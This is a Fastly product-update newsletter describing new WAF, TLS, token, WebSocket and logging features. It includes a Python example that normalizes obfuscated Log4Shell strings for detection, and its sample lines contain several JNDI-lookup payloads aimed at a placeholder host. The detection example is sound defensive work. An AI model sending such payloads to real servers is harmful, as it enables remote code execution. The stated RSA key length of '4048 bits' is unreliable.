Hi Fastly customers + friends,
Ending the year out strong, our product portfolio has grown to include even more network services, security, and observability capabilities. Next-Gen WAF now supports a Log4Shell attack signal within SmartParse and GraphQL Inspection by default, to keep up with the evolving threat landscape. To protect against DDoS attacks, TLS support for ECDSA certificates is now available in the Fastly UI. Automation Tokens and custom headers for health checks entered general availability; both streamline service management workflows. Two new features, WebSockets and Image Optimizer self-enablement, are also available in the Fastly console. Google Cloud Storage, BigQuery, and Pub/Sub logging endpoints no longer require saving service account keys in the Fastly app, so customers can manage temporary credentials for logging endpoint configuration.
An Automation Token is a type of authentication token that allows non-human clients, such as continuous integration and build systems, to perform actions via the Fastly API. Because Automation Tokens are not tied to human user identities, they mitigate the risk of business interruption for our customers if an individual departs their organization. The tokens also improve security posture, as access can be restricted to one, several, or all services. Automation Tokens also support compliance, since service activity performed with them is accurately represented in the audit log.
This feature allows customers to add custom headers to health check probes in the UI and API without blocking auto-generation of VCL. It unblocks customers who require pre-shared keys, API keys, or other custom header values in health checks originating from Fastly, without needing a custom VCL solution as a temporary workaround.
We have added support for WebSockets, a channel for open two-way interactive communication between the end user's browser and the origin server. WebSockets are long-lived connections that can carry data in either direction at any time and do not follow a request-response cycle, which is our normal processing mode for edge traffic. However, any connection that begins life as an HTTP request can be upgraded to a WebSocket connection. Customers who have WebSockets implemented at their origin can share the same domain used for content delivery. Enable WebSockets directly from your Compute or Delivery environment to begin connection upgrades and backend selection, available via Wasm or VCL.
Our powerful Fastly Image Optimizer can now be instantly enabled or disabled within the Fastly app (UI) and API. With self-service, Fastly users have the flexibility and control to manage Image Optimizer at scale, with automation that is fully integrated into existing processes and workflows. Operational complexity and time to value are greatly reduced, as our customers' end users start realizing the value of IO immediately after purchase.
SmartParse has now been extended to receive a complex Log4Shell payload and distill it down into its most basic form. Last year, we issued an immediate virtual patch to protect our customers from CVE-2021-44228, a zero-day vulnerability that targeted Log4j users. Usually our attack and anomaly signals leverage our SmartParse technology, but we sometimes implement regex-based immediate virtual patches, especially when variants are evolving by the minute. Leveraging SmartParse provides advanced and precise detection with minimal-to-no false positives, and without managing and relying on an ever-expanding set of regex patterns. With attack signals, SmartParse also allows you to build rules at an organization or corp level, quickly implementing a response policy across your global organization.
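To illustrate what "distilling a payload down to its most basic form" means in practice, here is an added example (not Fastly's SmartParse code) that collapses the nested `${lower:}`, `${upper:}` and `${x:-default}` lookup forms from the inside out and then checks for the underlying JNDI lookup, run over a few constructed request log lines:

```python
import re

# One innermost ${...} lookup: its body contains no further braces.
INNER = re.compile(r"\$\{([^{}]*)\}")
# After normalization, a JNDI lookup is the indicator of interest.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Simplify one lookup body, or return None if it cannot be reduced."""
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":   # ${lower:X} -> x
        return rest.lower()
    if sep and head.lower() == "upper":   # ${upper:x} -> X
        return rest.upper()
    return None                           # e.g. jndi:..., date:... stay as-is


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse obfuscation lookups inside-out; bounded to avoid pathological input."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


def is_log4shell(text: str) -> bool:
    """True if the normalized text still carries a ${jndi:...} lookup."""
    return JNDI.search(normalize(text)) is not None


# Constructed sample log lines (not real traffic); hostnames are placeholders.
SAMPLE_LINES = [
    'GET / "Mozilla/5.0"',
    'GET / "${jndi:ldap://lookup.example/a}"',
    'GET / "${${lower:j}ndi:${lower:l}dap://lookup.example/a}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://lookup.example/x}"',
    'GET / "report-${date:yyyy}"',
]


def scan(lines):
    """Return (index, normalized line) for each line flagged as Log4Shell."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_log4shell(l)]
```

Matching on the normalized form, rather than on each obfuscated variant, is what removes the need to keep adding regex patterns as new variants appear.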
GraphQL Inspection is now in general availability within Fastly's Next-Gen WAF. Without additional setup, our current set of WAF detections applies to GraphQL requests, including OWASP-style attacks and other attack traffic. We added GraphQL-specific attack and anomaly Signals so that customers can apply specific routing to handle certain targeted attacks, as well as apply custom rules. As common attack vectors continue to evolve, so does API security, with new technology and out-of-the-box solutions like GraphQL Inspection.
Customer-provisioned ECDSA (Elliptic Curve Digital Signature Algorithm) certificates can be uploaded and deployed just the same as RSA certificates, via the Fastly app (UI) or API. Industry-standard RSA certificates have not changed much in the past, but as the scale of Distributed Denial of Service (DDoS) attacks expands, organizations are upgrading their TLS setup. When RSA key lengths get too large (key lengths of 4048 bits), the TLS handshake becomes a potential DDoS vector. ECDSA certificates improve security and the speed at which end users are connected to services by using smaller Public Key Infrastructure (PKI) keys that require less compute power while establishing a TLS connection.
IAM (Identity and Access Management) secrets-free authentication makes configuring Google Cloud Storage, BigQuery, and Pub/Sub logging endpoints simple and secure by managing temporary credentials on your behalf instead of asking you to store your service account keys with Fastly. With this level of enterprise-grade access control, centralized access management eliminates the need for local identities in logging configurations, reducing costs by making application administration simpler and faster, and increasing productivity by automating the IAM lifecycle. IAM adheres to compliance standards by verifying protections on your data, including who has access to it and how that access is protected.